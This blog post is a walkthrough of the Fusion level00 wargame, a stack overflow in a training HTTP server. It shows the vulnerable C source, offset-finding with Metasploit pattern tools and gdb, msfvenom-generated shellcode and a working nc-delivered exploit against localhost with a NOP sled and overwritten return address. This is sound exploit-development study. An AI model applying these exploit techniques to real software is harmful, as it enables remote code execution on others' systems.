Fusion level00

2023-04-22 Saturday / 0 comments / 0 likes / 70 reads / 7930 characters


After a bit more than half a month I finished Protostar; I rested for a few days and am now continuing with Fusion.

********* Aside begins **********

Back in university I kept agonizing over whether to take the programmer's road, and in the end I gave it up because long stretches of high-intensity coding made me feel unwell. Still, I have to praise that feeling you get when you finally fix a bug. Nowadays, finishing a challenge gives me that same feeling~~~~

********* Aside ends **********

level00 source:

#include "../common/common.c"

int fix_path(char *path)
{
  char resolved[128];

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open

  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT);
  set_io(fd);

  parse_http_request();
}

The Fusion challenges are the advanced version of Protostar and the difficulty is higher; level00, of course, is still a warm-up. The challenge hint tells us this is a stack problem, and that the shellcode should be placed outside `resolved`.

Since it is a stack problem, let's feed it a longer string.

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################
# To change where core files are written:                            #
# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'   #
######################################################################

Inspect the core file with gdb:

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

Using the pattern_offset.rb tool:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

So the overflowing bytes overwrite EIP at offset 139.

Next, the shellcode has to go into the input, and the core file is used to find where the shellcode lands.

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


From this we can see that the string we wrote is recorded starting at 0xbf89b3d5. As before, some 0x90 padding goes in front of the shellcode, so the payload layout should look like this:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.1
0x90……0x90[SHELLCODE]

First, obtain a shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


And so:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/
